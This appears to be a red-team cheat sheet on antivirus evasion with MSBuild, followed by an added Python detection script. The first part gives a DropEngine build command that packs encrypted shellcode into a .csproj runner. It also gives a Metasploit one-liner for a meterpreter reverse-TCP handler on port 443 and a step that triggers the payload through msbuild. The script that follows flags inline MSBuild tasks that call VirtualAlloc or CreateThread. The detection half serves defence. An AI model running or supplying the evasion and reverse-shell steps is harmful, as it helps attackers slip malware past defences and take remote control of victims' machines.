Antivirus Evasion
DropEngine
- https://github.com/s0lst1c3/dropengine
Create shell.bin
Create csproj payload
python3 dropengine.py --build \
    --interface csharp_runner_interface \
    --crypter crypter_aes \
    --decrypter decrypter_csharp_rijndael_aes \
    --ekey ekey_static \
    --runner msbuild_csharp_runner \
    --dkey dkey_csharp_static \
    --executor executor_csharp_virtual_alloc_thread \
    --mutator mutator_random_string \
    --shellcode shell.bin \
    --o example.csproj
Start the handler
msfconsole -q -x 'use multi/handler; set payload windows/meterpreter_reverse_tcp; set lhost eth0; set lport 443; exploit'
Trigger the payload using msbuild
- https://lolbas-project.github.io/lolbas/Binaries/Msbuild/
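
Detection side of the steps above, as an added example (not DropEngine code and not part of the original notes): a static triage of MSBuild project files that flags inline tasks compiling embedded C# and native-memory API references inside them. It assumes the generated .csproj uses an MSBuild inline task (UsingTask with a code task factory) and that the executor P/Invokes VirtualAlloc/CreateThread as its name suggests; the function names and both sample projects are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Task factories that compile source code embedded in a project file.
INLINE_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}
# Assumed indicators, chosen from the executor name on this page
# (executor_csharp_virtual_alloc_thread); tune for your environment.
NATIVE_API = re.compile(r"\b(DllImport|VirtualAlloc|CreateThread|Marshal\.Copy)\b")

# Constructed sample: inline task with declarations only, no payload.
SAMPLE = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build"><Demo /></Target>
  <UsingTask TaskName="Demo" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\\Microsoft.Build.Tasks.v4.0.dll">
    <Task><Code Type="Class" Language="cs"><![CDATA[
      [DllImport("kernel32")] static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
      [DllImport("kernel32")] static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr f, IntPtr p, uint c, IntPtr i);
    ]]></Code></Task>
  </UsingTask>
</Project>"""
# Constructed sample: ordinary SDK-style project with no inline task.
BENIGN = '<Project Sdk="Microsoft.NET.Sdk"><PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup></Project>'

def local(tag):
    """Strip the XML namespace so legacy and SDK-style projects both match."""
    return tag.rsplit("}", 1)[-1]

def triage_project(xml_text):
    """Return a list of findings for one MSBuild project file."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return ["unparseable project file"]
    findings = []
    for el in root.iter():
        factory = el.get("TaskFactory", "")
        if local(el.tag) != "UsingTask" or factory.lower() not in INLINE_FACTORIES:
            continue
        name = el.get("TaskName", "?")
        findings.append(f"inline task '{name}' via {factory}")
        for code in el.iter():
            if local(code.tag) == "Code":
                hits = sorted(set(NATIVE_API.findall(code.text or "")))
                if hits:
                    findings.append(f"task '{name}' code references: {', '.join(hits)}")
    return findings

if __name__ == "__main__":
    for line in triage_project(SAMPLE):
        print(line)
```

Pair the file check with process telemetry: msbuild.exe launched outside a build pipeline or developer toolchain, against a project file in a user-writable path, is worth alerting on by itself.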